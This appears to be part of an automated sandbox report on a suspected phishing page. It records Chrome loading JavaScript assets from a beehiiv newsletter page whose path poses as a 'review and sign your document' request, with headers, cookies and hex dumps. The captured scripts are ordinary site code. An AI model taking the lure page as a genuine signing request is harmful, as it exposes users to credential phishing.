                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC904INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 561
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"231-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8acfc2f4314-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC465INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 30 64 39 63 32 32 38 2d 33 39 39 30 2d 35 39 32 39 2d 38 39 63 31 2d 33 66 38 32 63 31 63 34 36 37 32 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="10d9c228-3990-5929-89c1-3f82c1c46723")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC96INData Raw: 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 49 73 4c 6f 67 67 65 64 49 6e 2d 42 62 55 33 2d 71 34 33 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 31 30 64 39 63 32 32 38 2d 33 39 39 30 2d 35 39 32 39 2d 38 39 63 31 2d 33 66 38 32 63 31 63 34 36 37 32 33 0a
                                                                                                                                            Data Ascii: ourceMappingURL=useIsLoggedIn-BbU3-q43.js.map//# debugId=10d9c228-3990-5929-89c1-3f82c1c46723


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            73192.168.2.1649799104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC550OUTGET /assets/index-EzvqLY92.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2258
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"8d2-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8acea8a0cba-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 64 32 64 35 34 64 36 2d 33 66 63 39 2d 35 66 36 61 2d 38 30 35 64 2d 36 63 38 30 31 66 37 36 63 35 39 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0d2d54d6-3fc9-5f6a-805d-6c801f76c592")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 73 2d 63 65 6e 74 65 72 20 64 69 73 61 62 6c 65 64 3a 62 67 2d 67 72 61 79 2d 34 30 30 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 66 6f 63 75 73 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 20 66 6f 63 75 73 3a 72 69 6e 67 2d 32 20 66 6f 63 75 73 3a 72 69 6e 67 2d 6f 66 66 73 65 74 2d 32 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 74 72 61 6e 73 69 74 69 6f 6e 2d 63 6f 6c 6f 72 73 22 2c 6d 3d 22 62 6f 72 64 65 72 2d 77 74 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 70 72 69 6d 61 72 79 20 62 67 2d 77 74 2d 70 72 69 6d 61 72 79 20 64 69 73 61 62 6c 65 64 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 35 30 30 20 66 6f 63 75 73 3a 72 69 6e 67 2d 77 74 2d 70 72 69 6d 61 72 79 22 2c 6c 3d 22 62
                                                                                                                                            Data Ascii: s-center disabled:bg-gray-400 disabled:cursor-not-allowed focus:outline-none focus:ring-2 focus:ring-offset-2 justify-center transition-colors",m="border-wt-primary text-wt-text-on-primary bg-wt-primary disabled:border-gray-500 focus:ring-wt-primary",l="b
                                                                                                                                            2025-01-15 18:14:36 UTC425INData Raw: 73 68 22 3f 41 3a 22 22 2c 53 3f 22 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 6f 70 61 63 69 74 79 2d 36 30 20 62 6f 72 64 65 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 22 3a 22 22 2c 6f 3f 22 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 62 6f 72 64 65 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 22 3a 22 22 2c 69 3f 22 77 2d 66 75 6c 6c 22 3a 22 22 2c 63 29 3b 72 65 74 75 72 6e 20 74 3f 6e 2e 6a 73 78 28 75 2c 7b 74 6f 3a 74 3f 2e 74 6f 2c 70 72 65 66 65 74 63 68 3a 74 3f 2e 70 72 65 66 65 74 63 68 7c 7c 22 6e 6f 6e 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 2c 73 74 79 6c 65 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 3a 6e 2e 6a 73 78 28 22 62 75 74 74 6f 6e 22 2c 7b 6f 6e 43 6c 69
                                                                                                                                            Data Ascii: sh"?A:"",S?"disabled:cursor-not-allowed opacity-60 border-transparent":"",o?"disabled:cursor-not-allowed border-transparent":"",i?"w-full":"",c);return t?n.jsx(u,{to:t?.to,prefetch:t?.prefetch||"none",className:a,style:s,children:e}):n.jsx("button",{onCli


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            74192.168.2.1649800104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC844OUTGET /assets/XMarkIcon-BIfmjQfr.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 10731
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"29eb-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ad198d7ca6-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 66 38 36 32 36 33 31 2d 33 32 65 65 2d 35 66 65 66 2d 39 66 33 35 2d 35 61 64 66 33 32 32 39 33 66 66 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cf862631-32ee-5fef-9f35-5adf32293ff4")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 79 20 61 73 20 4a 2c 73 20 61 73 20 57 2c 64 20 61 73 20 46 2c 6e 20 61 73 20 59 2c 75 20 61 73 20 5a 7d 66 72 6f 6d 22 2e 2f 74 72 61 6e 73 69 74 69 6f 6e 2d 79 2d 35 58 46 46 75 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 7a 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 74 72 65 65 2d 77 61 6c 6b 65 72 2d 49 6e 76 34 6d 64 73 50 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 68 20 61 73 20 65 65 2c 54 20 61 73 20 74 65 2c 5f 20 61 73 20 72 65 2c 4d 20 61 73 20 51 2c 44 20 61 73 20 47 2c 49 20 61 73 20 6e 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 73 63 72 65 65 6e
                                                                                                                                            Data Ascii: d-CaEu2o0u.js";import{y as J,s as W,d as F,n as Y,u as Z}from"./transition-y-5XFFuu.js";import{F as z}from"./use-tree-walker-Inv4mdsP.js";import{h as ee,T as te,_ as re,M as Q,D as G,I as ne}from"./use-is-mounted-BaHv16bB.js";function B(e){return[e.screen
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 72 20 61 2c 72 3b 6c 65 74 20 6e 3d 28 61 3d 65 2e 69 6e 6e 65 72 54 65 78 74 29 21 3d 6e 75 6c 6c 3f 61 3a 22 22 2c 6f 3d 65 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 3b 69 66 28 21 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 20 6e 3b 6c 65 74 20 74 3d 21 31 3b 66 6f 72 28 6c 65 74 20 75 20 6f 66 20 6f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 68 69 64 64 65 6e 5d 2c 5b 61 72 69 61 2d 68 69 64 64 65 6e 5d 2c 5b 72 6f 6c 65 3d 22 69 6d 67 22 5d 27 29 29 75 2e 72 65 6d 6f 76 65 28 29 2c 74 3d 21 30 3b 6c 65 74 20 6c 3d 74 3f 28 72 3d 6f 2e 69 6e 6e 65 72 54 65 78 74 29 21 3d 6e 75 6c 6c 3f 72 3a 22 22 3a 6e 3b 72 65 74 75 72 6e 20 4b 2e 74 65 73 74 28 6c 29 26 26 28 6c 3d 6c 2e 72 65
                                                                                                                                            Data Ascii: r a,r;let n=(a=e.innerText)!=null?a:"",o=e.cloneNode(!0);if(!(o instanceof HTMLElement))return n;let t=!1;for(let u of o.querySelectorAll('[hidden],[aria-hidden],[role="img"]'))u.remove(),t=!0;let l=t?(r=o.innerText)!=null?r:"":n;return K.test(l)&&(l=l.re
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 78 4f 66 28 72 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 2d 31 26 26 28 6f 3d 6e 75 6c 6c 29 2c 7b 69 74 65 6d 73 3a 6e 2c 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 3a 6f 7d 7d 6c 65 74 20 66 65 3d 7b 31 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 65 6e 75 53 74 61 74 65 3d 3d 3d 31 3f 65 3a 7b 2e 2e 2e 65 2c 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 3a 6e 75 6c 6c 2c 6d 65 6e 75 53 74 61 74 65 3a 31 7d 7d 2c 30 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 65 6e 75 53 74 61 74 65 3d 3d 3d 30 3f 65 3a 7b 2e 2e 2e 65 2c 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 21 31 2c 6d 65 6e 75 53 74 61 74 65 3a 30 7d 7d 2c 32 3a 28 65 2c 61 29 3d 3e 7b 76 61 72 20 72 3b 6c 65 74 20 6e 3d 6b 28 65 29 2c 6f 3d 6f 65 28 61 2c 7b 72 65 73 6f 6c 76 65 49 74 65 6d 73 3a
                                                                                                                                            Data Ascii: xOf(r):null;return o===-1&&(o=null),{items:n,activeItemIndex:o}}let fe={1(e){return e.menuState===1?e:{...e,activeItemIndex:null,menuState:1}},0(e){return e.menuState===0?e:{...e,__demoMode:!1,menuState:0}},2:(e,a)=>{var r;let n=k(e),o=oe(a,{resolveItems:
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 2e 60 29 3b 74 68 72 6f 77 20 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 26 26 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 72 2c 54 29 2c 72 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 65 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 56 28 61 2e 74 79 70 65 2c 66 65 2c 65 2c 61 29 7d 6c 65 74 20 70 65 3d 63 2e 46 72 61 67 6d 65 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 2c 61 29 7b 6c 65 74 7b 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 72 3d 21 31 2c 2e 2e 2e 6e 7d 3d 65 2c 6f 3d 63 2e 75 73 65 52 65 64 75 63 65 72 28 6d 65 2c 7b 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 72 2c 6d 65 6e 75 53 74 61 74 65 3a 72 3f 30 3a 31 2c 62 75 74 74 6f 6e 52 65 66 3a 63 2e 63 72 65 61 74 65 52
                                                                                                                                            Data Ascii: component.`);throw Error.captureStackTrace&&Error.captureStackTrace(r,T),r}return a}function me(e,a){return V(a.type,fe,e,a)}let pe=c.Fragment;function ve(e,a){let{__demoMode:r=!1,...n}=e,o=c.useReducer(me,{__demoMode:r,menuState:r?0:1,buttonRef:c.createR
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 3d 6c 2e 62 75 74 74 6f 6e 52 65 66 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 68 2e 66 6f 63 75 73 28 7b 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 3a 21 30 7d 29 7d 29 29 3a 28 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 28 7b 74 79 70 65 3a 30 7d 29 29 29 7d 29 2c 78 3d 63 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 28 7b 6f 70 65 6e 3a 6c 2e 6d 65 6e 75 53 74 61 74 65 3d 3d 3d 30 7d 29 2c 5b 6c 5d 29 2c 52 3d 7b 72 65 66 3a 73 2c 69 64 3a 6f 2c 74 79 70 65 3a 58 28 65 2c 6c 2e 62 75 74 74 6f 6e 52 65 66 29 2c 22 61 72 69 61 2d 68 61 73 70 6f 70 75 70 22 3a 22 6d 65 6e 75 22 2c 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 3a 28 72 3d 6c 2e 69 74 65 6d 73 52 65 66 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69
                                                                                                                                            Data Ascii: =l.buttonRef.current)==null?void 0:h.focus({preventScroll:!0})})):(d.preventDefault(),u({type:0})))}),x=c.useMemo(()=>({open:l.menuState===0}),[l]),R={ref:s,id:o,type:X(e,l.buttonRef),"aria-haspopup":"menu","aria-controls":(r=l.itemsRef.current)==null?voi
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 4d 2e 63 6c 69 63 6b 28 29 7d 47 28 75 2e 62 75 74 74 6f 6e 52 65 66 2e 63 75 72 72 65 6e 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 66 2e 41 72 72 6f 77 44 6f 77 6e 3a 72 65 74 75 72 6e 20 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 73 28 7b 74 79 70 65 3a 32 2c 66 6f 63 75 73 3a 67 2e 4e 65 78 74 7d 29 3b 63 61 73 65 20 66 2e 41 72 72 6f 77 55 70 3a 72 65 74 75 72 6e 20 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 73 28 7b 74 79 70 65 3a 32 2c 66 6f 63 75 73 3a 67 2e 50 72 65 76 69 6f 75 73 7d 29 3b 63 61 73 65 20 66 2e 48 6f 6d 65 3a 63 61 73 65 20 66 2e 50 61 67 65 55 70 3a 72 65 74 75 72 6e 20 69 2e 70 72 65
                                                                                                                                            Data Ascii: M.click()}G(u.buttonRef.current);break;case f.ArrowDown:return i.preventDefault(),i.stopPropagation(),s({type:2,focus:g.Next});case f.ArrowUp:return i.preventDefault(),i.stopPropagation(),s({type:2,focus:g.Previous});case f.Home:case f.PageUp:return i.pre
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 2e 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 21 3d 3d 6e 75 6c 6c 3f 6c 2e 69 74 65 6d 73 5b 6c 2e 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 5d 2e 69 64 3d 3d 3d 6e 3a 21 31 2c 70 3d 63 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 79 3d 77 28 61 2c 70 29 3b 24 28 28 29 3d 3e 7b 69 66 28 6c 2e 5f 5f 64 65 6d 6f 4d 6f 64 65 7c 7c 6c 2e 6d 65 6e 75 53 74 61 74 65 21 3d 3d 30 7c 7c 21 73 7c 7c 6c 2e 61 63 74 69 76 61 74 69 6f 6e 54 72 69 67 67 65 72 3d 3d 3d 30 29 72 65 74 75 72 6e 3b 6c 65 74 20 6d 3d 41 28 29 3b 72 65 74 75 72 6e 20 6d 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 29 3d 3e 7b 76 61 72 20 43 2c 5f 3b 28 5f 3d 28 43 3d 70 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 43 2e 73 63 72 6f 6c 6c
                                                                                                                                            Data Ascii: .activeItemIndex!==null?l.items[l.activeItemIndex].id===n:!1,p=c.useRef(null),y=w(a,p);$(()=>{if(l.__demoMode||l.menuState!==0||!s||l.activationTrigger===0)return;let m=A();return m.requestAnimationFrame(()=>{var C,_;(_=(C=p.current)==null?void 0:C.scroll
                                                                                                                                            2025-01-15 18:14:36 UTC693INData Raw: 74 6c 65 49 64 3a 61 2c 2e 2e 2e 72 7d 2c 6e 29 7b 72 65 74 75 72 6e 20 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 61 7d 2c 72 29 2c 65 3f 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 61 7d 2c 65 29 3a 6e 75 6c 6c 2c 63 2e 63 72 65 61 74 65
                                                                                                                                            Data Ascii: tleId:a,...r},n){return c.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":a},r),e?c.createElement("title",{id:a},e):null,c.create


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            75192.168.2.1649801104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC840OUTGET /assets/index-COqk5b7U.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
